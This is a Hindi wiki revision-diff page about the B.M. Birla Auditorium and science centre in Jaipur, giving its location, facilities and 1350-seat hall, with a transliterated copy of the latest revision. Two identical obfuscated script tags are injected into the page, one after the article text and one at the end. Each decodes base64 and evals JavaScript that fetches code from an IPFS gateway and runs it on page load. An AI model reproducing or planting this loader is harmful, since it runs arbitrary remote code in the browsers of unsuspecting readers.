Difference between revisions of "बी.एम. बिडला सभागार जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==अन्य लिंक==" to "==सम्बंधित लिंक==")
m (Adding category Category:जयपुर (को हटा दिया गया हैं।))
 
(8 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[चित्र:B-M-Birla-Planetarium-Jaipur.jpg|बी॰एम॰ बिडला सभागार, [[जयपुर]]<br /> B.M.Birla Auditorium, Jaipur|thumb]]
+
[[चित्र:B-M-Birla-Planetarium-Jaipur.jpg|thumb|250px|बी.एम. बिडला सभागार, [[जयपुर]]<br /> B.M.Birla Auditorium, Jaipur]]
*[[जयपुर]] में [[स्‍टेच्‍यू सर्किल जयपुर|स्‍टेच्‍यू सर्किल]] एवं शासन सचिवालय के पास 9.8 एकड भूमि पर बिडला विज्ञान एवं तकनीकी केन्‍द्र स्थित है।  
+
*[[जयपुर]] में [[स्टैच्यू सर्किल जयपुर|स्‍टेच्‍यू सर्किल]] एवं शासन सचिवालय के पास 9.8 एकड भूमि पर बिडला विज्ञान एवं तकनीकी केन्‍द्र स्थित है।  
 
*इस केन्‍द्र में विज्ञान संग्रहालय, कम्‍प्‍यूटर केन्‍द्र, अनुसंधान केन्‍द्र एवं पुस्‍तकालय है।  
 
*इस केन्‍द्र में विज्ञान संग्रहालय, कम्‍प्‍यूटर केन्‍द्र, अनुसंधान केन्‍द्र एवं पुस्‍तकालय है।  
 
*बिडला तारामण्‍डल देशी विदेशी पर्यटकों के आकर्षक का मुख्‍य केन्‍द्र है।  
 
*बिडला तारामण्‍डल देशी विदेशी पर्यटकों के आकर्षक का मुख्‍य केन्‍द्र है।  
*परिसर में स्थित 1350 दर्शकों के बैठने की क्षमता से युक्‍त अन्‍तर्राष्‍ट्रीय स्‍तर का सभागार यहां की मुख्‍य पहचान बन चुका है।  
+
*परिसर में स्थित 1350 दर्शकों के बैठने की क्षमता से युक्‍त अन्‍तर्राष्‍ट्रीय स्‍तर का सभागार यहाँ की मुख्‍य पहचान बन चुका है।  
 
*इस केन्‍द्र के मुख्‍य प्रवेश द्वार पर [[आमेर का क़िला जयपुर|आमेर क़िले]] की गणेश पाल की प्रतिकृति निर्मित की गयी है।
 
*इस केन्‍द्र के मुख्‍य प्रवेश द्वार पर [[आमेर का क़िला जयपुर|आमेर क़िले]] की गणेश पाल की प्रतिकृति निर्मित की गयी है।
  
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
  
{| width="100%"
 
|-
 
|
 
==सम्बंधित लिंक==
 
|-
 
|
 
{{राजस्थान के पर्यटन स्थल}}
 
|}
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 +
[[Category:जयपुर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:50, 27 March 2012

[[chitr:B-M-Birla-Planetarium-Jaipur.jpg|thumb|250px|bi.em. bidala sabhagar, jayapur
B.M.Birla Auditorium, Jaipur]]

  • jayapur mean sh‍techh‍yoo sarkil evan shasan sachivalay ke pas 9.8 ekad bhoomi par bidala vijnan evan takaniki kenh‍dr sthit hai.
  • is kenh‍dr mean vijnan sangrahalay, kamh‍ph‍yootar kenh‍dr, anusandhan kenh‍dr evan push‍takalay hai.
  • bidala taramanh‍dal deshi videshi paryatakoan ke akarshak ka mukhh‍y kenh‍dr hai.
  • parisar mean sthit 1350 darshakoan ke baithane ki kshamata se yukh‍t anh‍tarrashh‍triy sh‍tar ka sabhagar yahaan ki mukhh‍y pahachan ban chuka hai.
  • is kenh‍dr ke mukhh‍y pravesh dvar par amer qile ki ganesh pal ki pratikriti nirmit ki gayi hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>